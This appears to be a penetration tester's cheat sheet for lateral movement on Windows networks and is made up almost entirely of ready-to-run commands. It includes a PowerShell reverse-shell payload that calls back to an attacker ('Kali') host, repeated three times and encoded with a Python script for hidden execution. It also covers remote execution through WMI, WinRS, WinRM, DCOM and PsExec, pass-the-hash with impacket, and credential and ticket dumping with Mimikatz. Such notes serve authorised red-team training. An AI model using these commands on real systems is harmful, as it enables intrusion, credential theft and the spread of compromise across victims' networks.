Lateral Movement

WMI and WinRM

WMI (Windows Management Instrumentation)

1

Test if can create process

wmic /node:<Target IP Address> /user:<Username> /password:<Password> process call create "calc"

2

Create the following python script

import sys
import base64

payload = '$client = New-Object System.Net.Sockets.TCPClient("<Kali IP Address>",<Kali Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()

print(cmd)

3

Run the script

python3 encode.py

4

Paste the following in PowerShell

$username = '<Username>';
$password = '<Password>';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;

$Options = New-CimSessionOption -Protocol DCOM
$Session = New-Cimsession -ComputerName <Target IP Address> -Credential $credential -SessionOption $Options

$Command = '<Paste the output from previous step>';

Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $Command};

WinRS

NOTE: In order for WinRS to work, the user has to be part of the Administrators or Remote Management Users group on the Target Machine

1

Test if command is able to run

winrs -r:<Target Hostname> -u:<Username> -p:<Password>  "cmd /c hostname & whoami"

2

Create the following python script

import sys
import base64

payload = '$client = New-Object System.Net.Sockets.TCPClient("<Kali IP Address>",<Kali Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()

print(cmd)

3

Run the script

python3 encode.py

4

Send payload

winrs -r:<Target Hostname> -u:<Username> -p:<Password> "<Paste the output from previous step>"

WinRM

1

Paste the following in PowerShell

$username = '<Username>';
$password = '<Password>';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
New-PSSession -ComputerName <Target IP Address> -Credential $credential

2

Interact with the Session ID

Enter-PSSession <Id>

PsExec

NOTE: For PsExec to be executed successfully three conditions must be met

1. The user that authenticates to target machine must be in Administrators local group

2. ADMIN$ share must be available (Default available)

3. File and Printer Sharing has to be turned on (Default on)

C:\Tools\SysinternalsSuite\PsExec.exe -i \\<Target Hostname> -u <Domain Name>\<Username> -p <Password> cmd

Pass the hash

NOTE: For Pass the Hash to be executed successfully three conditions must be met

1. SMB connection through the Firewall (Port 445)

2. Windows File and Printer Sharing feature to be enabled (Default enabled)

3. ADMIN$ share to be available (Default available) and Local Administrative Permission

impacket-wmiexec -hashes :<NTLM Hash> <Username>@<Target IP Address>

impacket-psexec -hashes :<NTLM Hash> <Username>@<Target IP Address>

Overpass the Hash

NOTE: For Overpass the Hash to work, must have the NTLM hash of the user

NOTE: Use this when want to access other service as another user

1

Run mimikatz.exe

C:\Tools\mimikatz.exe

2

Enable SeDebugPrivilege

privilege::debug

3

Dump NTLM hash

sekurlsa::logonpasswords

4

Craft a Kerberos ticket

sekurlsa::pth /user:<Username> /domain:<Domain Name> /ntlm:<NTLM Hash> /run:powershell

5

Authenticate a service

net use \\<Target Hostname>

6

Verify if ticket is acquired

klist

7

Run PsExec.exe

C:\Tools\SysinternalsSuite\PsExec.exe \\<Target Hostname> cmd

Pass the ticket

NOTE: Use this when want to access other service as another user

1

Run mimikatz.exe

C:\Tools\mimikatz.exe

2

Enable SeDebugPrivilege

privilege::debug

3

Exports the tickets

sekurlsa::tickets /export

4

Find the kirbi files in PowerShell

dir *.kirbi

5

Use the ticket

kerberos::ptt <Directory Name>

6

Verify if ticket is acquired

klist

DCOM

1

Paste the following in PowerShell

$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","<Target IP Address>"))

2

Create the following python script

import sys
import base64

payload = '$client = New-Object System.Net.Sockets.TCPClient("<Kali IP Address>",<Kali Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()

print(cmd)

3

Run the script

python3 encode.py

4

Paste the payload in PowerShell

$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"<Paste the output from previous step>","7")